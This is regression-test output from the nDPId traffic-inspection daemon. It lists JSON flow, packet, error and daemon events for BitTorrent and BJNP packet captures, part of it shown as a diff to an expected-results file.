00838{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469967550,"flow_last_seen":1455469968002,"flow_idle_time":7560000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":871,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00839{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469974533,"flow_last_seen":1455469974889,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00701{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1455469969259,"flow_last_seen":1455469973374,"flow_idle_time":7560000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":1030,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469980213,"flow_last_seen":1455469981133,"flow_idle_time":7560000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978422,"flow_last_seen":1455469978679,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469975240,"flow_last_seen":1455469975394,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":87,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00840{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469970233,"flow_last_seen":1455469971153,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":951,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469975234,"flow_last_seen":1455469976169,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":534,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978413,"flow_last_seen":1455469978679,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":882,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1455469980262,"flow_last_seen":1455469980488,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":732,"flow_avg_l4_payload_len":244,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469971675,"flow_last_seen":1455469973590,"flow_idle_time":7560000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00843{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1455469976582,"flow_last_seen":1455469980118,"flow_idle_time":7560000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1088,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00838{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469969441,"flow_last_seen":1455469969689,"flow_idle_time":7560000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":554,"flow_tot_l4_payload_len":850,"flow_avg_l4_payload_len":170,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469977229,"flow_last_seen":1455469977324,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":552,"flow_tot_l4_payload_len":896,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1455469971321,"flow_last_seen":1455469972136,"flow_idle_time":7560000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":535,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00849{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1455469976336,"flow_last_seen":1455469982106,"flow_idle_time":7560000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":271267,"flow_avg_l4_payload_len":1291,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1455469967246,"flow_last_seen":1455469967465,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":558,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00843{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469974358,"flow_last_seen":1455469976244,"flow_idle_time":7560000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","packets-captured":299,"packets-processed":299,"total-skipped-flows":0,"total-l4-data-len":285982,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":24,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":24,"total-idle-flows":24,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":134,"global_ts_msec":1455469982106}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 299/299

82
test/results/bjnp.pcap.out
View File

@@ -1,38 +1,58 @@
00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"bjnp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1467725378685}
00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725378685}
00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmDAAB5EfxOwKi5jcCoARHDpyGkABg0Q0JKTlACAQAAF6QAAAAAAADK6w=="}
00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725383705}
00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmRAAB5EfxQwKi5jcCoAQHDqSGkABg0T0JKTlACAQAAF6YAAAAAAACF3A=="}
00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725383909}
00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmSAAB5EfxOwKi5jcCoAQLDqSGkABg0TUJKTlACAQAAF6cAAAAAAAAfDQ=="}
00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725384113}
00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmTAAB5EfxMwKi5jcCoAQPDqSGkABg0S0JKTlACAQAAF6gAAAAAAACCRA=="}
00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725384313}
00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmVAAB5EfxJwKi5jcCoAQTDqSGkABg0SUJKTlACAQAAF6kAAAAAAADs+w=="}
00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725384517}
00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmWAAB5EfxHwKi5jcCoAQXDqSGkABg0R0JKTlACAQAAF6oAAAAAAADhdg=="}
00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725384721}
00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmXAAB5EfxFwKi5jcCoAQbDqSGkABg0RUJKTlACAQAAF6sAAAAAAACzRQ=="}
00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725384921}
00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmYAAB5EfxDwKi5jcCoAQfDqSGkABg0Q0JKTlACAQAAF6wAAAAAAAC5aQ=="}
00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725385125}
00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmaAAB5EfxAwKi5jcCoAQjDqSGkABg0QUJKTlACAQAAF60AAAAAAACvDw=="}
00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725385329}
00314{"packet_event_id":1,"packet_event_name":"packet","packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmbAAB5Efw+wKi5jcCoAQnDqSGkABg0P0JKTlACAQAAF64AAAAAAABjbw=="}
00546{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1467725385329}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725378685,"flow_last_seen":1467725378685,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725378685,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.17","src_port":50087,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3}
00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1467725378685,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725378685,"pkt":"RQAALAmDAAB5EfxOwKi5jcCoARHDpyGkABg0Q0JKTlACAQAAF6QAAAAAAADK6w=="}
